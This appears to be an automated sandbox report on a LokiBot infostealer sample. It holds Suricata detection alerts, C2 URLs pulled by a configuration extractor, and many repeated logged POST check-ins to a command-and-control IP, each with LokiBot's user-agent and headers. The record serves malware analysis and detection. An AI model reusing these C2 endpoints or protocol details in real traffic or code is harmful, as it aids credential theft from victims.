                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50067 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50067 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50067 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50067 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50069 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50069 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50069 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50069 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50082 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50082 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50082 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50082 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50085 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50085 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50085 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50085 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50090 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50090 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50090 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50090 -> 94.156.177.41:80
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Joe Sandbox ViewIP Address: 94.156.177.41 94.156.177.41
                Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 172Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 172Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
